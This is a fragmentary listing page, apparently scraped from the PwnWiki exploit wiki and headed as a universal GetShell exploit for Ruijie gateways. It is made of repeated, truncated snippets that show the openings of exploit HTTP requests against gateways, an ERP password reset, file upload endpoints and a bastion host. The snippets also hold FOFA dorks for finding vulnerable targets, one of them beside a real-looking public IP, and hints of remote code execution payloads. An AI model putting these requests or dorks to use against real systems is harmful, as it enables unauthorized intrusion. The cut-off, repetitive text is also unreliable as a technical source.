锐捷网关系列通杀GetShell
免费、自由、人人(PwnWiki.Com)可编辑的漏洞库 , EXP POST /guest_auth/guestIsUp.php HTTP/1.1 Host: 192.168.10.1 Connection: close Upgrade- ...
免费、自由、人人(PwnWiki.Com)可编辑的漏洞库 , EXP POST /guest_auth/guestIsUp.php HTTP/1.1 Host: 192.168.10.1 Connection: close Upgrade- ...
免费、自由、人人(PwnWiki.Com)可编辑的漏洞库 , FOFA title="华夏ERP" EXP POST /user/resetPwd HTTP/1.1 Host: 47.116.69.14 Accept: applicatio ...
免费、自由、人人可编辑的漏洞库 , POC POST /uai/download/uploadfileToPath.htm HTTP/1.1 HOST: xxxxx ... ... ----------------------------- ...
PWNWIK.COM==免费、自由、人人可编辑的漏洞库 , Contents 1 漏洞利用 1.1 远程代码执行命令phpnifo(); 1.1.1 Payload2 1.2 远程代码执行命令system('whoami'); 1.2.1 ...
PWNWIK.COM , FOFA "/seller.php?s=/Public/login" Request POST /wxapp.php?controller=Goods.doPageUpload HTTP/1.1 Host: Con ...
免费、自由、人人可编辑的漏洞库--PwnWiki.com , FOFA "/seller.php?s=/Public/login" Request POST /wxapp.php?controller=Goods.doPageUpload ...
免费、自由、人人可编辑的漏洞库--pwnwiki.com , POC https://127.0.0.1/por/changetelnum.csp?apiversion=1 POST: newtel=TARGET_PHONE&ses ...
pwnwiki.com , 漏洞利用 抓包: POST /JusNotary/ HTTP/1.1 Host: xxx.xxx.xxx.xxx Content-Length: 219 Cache-Control: max-age=0 Upgr ...
PWNWIK.COM , 影响范围 LogBase-B798 bh-x64-v7.0.15 漏洞利用 获取INFO字段,u1参数值为用户名 POST /bhost/set_session HTTP/1.1Host:xx.xx.xx.xxu1 ...
pwnwiki.com , POC POST /uai/download/uploadfileToPath.htm HTTP/1.1 HOST: www.0-sec.org ... ... ------------------------- ...